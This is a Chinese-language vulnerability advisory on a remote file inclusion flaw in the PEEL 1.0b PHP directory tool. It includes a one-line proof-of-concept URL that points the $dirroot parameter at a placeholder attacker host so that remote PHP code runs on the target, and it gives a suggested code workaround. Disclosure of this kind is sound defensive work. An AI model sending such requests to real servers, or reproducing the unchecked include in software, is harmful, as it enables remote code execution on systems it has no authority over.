发布日期：2002-12-31
更新日期：2003-01-07

受影响系统：

PEEL PEEL 1.0b

描述：

---

BUGTRAQ  ID: 6496

PEEL是一款PHP编写的目录管理工具。

haut.php脚本对用户提交的参数缺少正确检查，远程攻击者可以利用这个漏洞指定远程服务器上任意文件为包含文件，以WEB权限执行包含文件中的代码。

modeles/haut.php没有正确处理$dirroot参数的内容，远程攻击者可以在自己控制的服务器上构建任意PHP文件，提交包含远程服务器文件的参数数据的请求，可导致包含文件的代码以WEB权限在系统上执行。

<*来源：Frog Man （leseulfrog@hotmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104134955907018&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Frog Man （leseulfrog@hotmail.com）提供了如下测试方法：

http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=.

远程服务器上需要提供包含任意代码的如下文件：

http://[attacker]/lang/lang.php

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 使用如下代码：

<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
if (file_exists($langfile)){
require ($langfile);
}
?>

更替'modeles/haut.php'中的如下脚本：

<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>

厂商补丁：

PEEL
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mapetite-entreprise.com/

浏览次数：2709
严重程度：0（网友投票）